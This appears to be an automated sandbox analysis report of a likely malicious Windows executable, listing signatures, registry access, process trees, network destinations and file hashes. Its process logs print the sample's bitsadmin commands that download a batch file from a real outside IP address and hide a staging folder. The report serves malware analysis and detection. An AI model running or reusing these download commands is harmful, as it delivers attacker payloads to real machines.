Analysis Overview
SHA256
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
Threat Level: Likely malicious
The file ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe was found to be: Likely malicious.
Malicious Activity Summary
Download via BitsAdmin
Checks computer location settings
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 02:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 02:12
Reported
2024-08-06 02:15
Platform
win7-20240704-en
Max time kernel
14s
Max time network
18s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
"C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t3935.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
C:\Windows\SysWOW64\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /crEaTe pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /ResUme pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /CompLete pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 164.90.244.116:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\ytmp\t3935.bat
| Hash | Value |
|---|---|
| MD5 | 3baa57d1131417b71e8d0bfb45f46ec3 |
| SHA1 | 8443f01dc35d643cf2071c2dd90787d972de64f7 |
| SHA256 | 5911b623c6db07db3193f1ea5f9ba561c04292ec9acabf4586469aa0c77058c8 |
| SHA512 | 0563c9ad298a7f85880afd0f40867a6a67e13bc5a1b5c230f8545b8ba1dc896927b8eb34a54ad7880bd8d43f7108a2ede2710dcfdbf55abd9b22b0b4ef958024 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-06 02:12
Reported
2024-08-06 02:15
Platform
win10v2004-20240802-en
Max time kernel
125s
Max time network
131s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
"C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t14845.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
C:\Windows\SysWOW64\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /crEaTe pls
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4328,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /ResUme pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /CompLete pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 164.90.244.116:80 | | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\ytmp\t14845.bat
| Hash | Value |
|---|---|
| MD5 | d813dcd73594622bd3f1deefd3661175 |
| SHA1 | 5fe85bc7dde7c19f166452641d889ff48f70022d |
| SHA256 | 3d73776fc4c2cd443e448831a16646c779a9f24f2b1c299d9eb41e2f928f445b |
| SHA512 | 347bef14d9e32f00265c72ef10b8da733a2486ac8567198123f40dbcd953cb1dd6dc171bbea2c3aae270c8eafe112ec9913186f23cb91ef29c74f37d7946aa80 |